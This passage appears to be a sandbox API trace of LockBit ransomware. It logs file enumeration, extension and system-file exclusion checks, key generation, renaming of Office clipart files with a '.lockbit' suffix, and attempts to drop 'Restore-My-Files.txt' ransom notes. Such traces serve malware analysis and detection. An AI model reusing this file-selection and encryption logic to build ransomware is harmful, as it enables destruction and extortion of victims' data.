[0109.154] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.154] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.154] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.lockbit") returned 72 [0109.154] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.155] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.155] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.155] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6996) returned 1 [0109.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.156] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.163] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.163] malloc (_Size=0xa6) returned 0x77d800 [0109.163] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.166] free (_Block=0x77d800) [0109.166] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.166] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.166] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.166] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd52c3c00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd52c3c00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x2576, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00525_.WMF", cAlternateFileName="")) returned 1 [0109.167] lstrcmpiW (lpString1=".", lpString2="BL00525_.WMF") returned -1 [0109.167] lstrcmpiW (lpString1="..", lpString2="BL00525_.WMF") returned -1 [0109.167] PathFindExtensionW (pszPath="BL00525_.WMF") returned=".WMF" [0109.167] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.167] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.167] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.167] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.167] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.167] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.167] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.167] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.167] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.168] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.168] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00525_.WMF") returned 1 [0109.169] lstrcmpiW (lpString1="ntldr", lpString2="BL00525_.WMF") returned 1 [0109.169] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00525_.WMF") returned 1 [0109.169] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00525_.WMF") returned 1 [0109.169] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00525_.WMF") returned -1 [0109.169] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00525_.WMF") returned 1 [0109.169] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00525_.WMF") returned 1 [0109.169] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.169] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned=".WMF" [0109.169] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.169] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.169] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.170] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.170] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.170] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.170] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.170] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.170] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.170] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.170] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.170] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.lockbit") returned 72 [0109.170] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.170] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.170] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.171] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9590) returned 1 [0109.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.172] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.175] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.176] malloc (_Size=0xa6) returned 0x77d800 [0109.176] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.180] free (_Block=0x77d800) [0109.180] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.180] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.180] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3fb0f00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd3fb0f00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x6ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00526_.WMF", cAlternateFileName="")) returned 1 [0109.180] lstrcmpiW (lpString1=".", lpString2="BL00526_.WMF") returned -1 [0109.180] lstrcmpiW (lpString1="..", lpString2="BL00526_.WMF") returned -1 [0109.181] PathFindExtensionW (pszPath="BL00526_.WMF") returned=".WMF" [0109.181] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.181] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.181] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.182] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00526_.WMF") returned 1 [0109.182] lstrcmpiW (lpString1="ntldr", lpString2="BL00526_.WMF") returned 1 [0109.182] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00526_.WMF") returned 1 [0109.182] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00526_.WMF") returned 1 [0109.182] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00526_.WMF") returned -1 [0109.182] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00526_.WMF") returned 1 [0109.182] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00526_.WMF") returned 1 [0109.183] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.183] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned=".WMF" [0109.183] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.183] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.183] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.184] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.184] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.lockbit") returned 72 [0109.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.184] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.184] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.184] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=27552) returned 1 [0109.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.186] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.191] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.191] malloc (_Size=0xa6) returned 0x77d800 [0109.191] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.193] free (_Block=0x77d800) [0109.193] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.193] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.193] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20fce500, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x20fce500, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cec, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00648_.WMF", cAlternateFileName="")) returned 1 [0109.194] lstrcmpiW (lpString1=".", lpString2="BL00648_.WMF") returned -1 [0109.194] lstrcmpiW (lpString1="..", lpString2="BL00648_.WMF") returned -1 [0109.194] PathFindExtensionW (pszPath="BL00648_.WMF") returned=".WMF" [0109.194] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.194] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 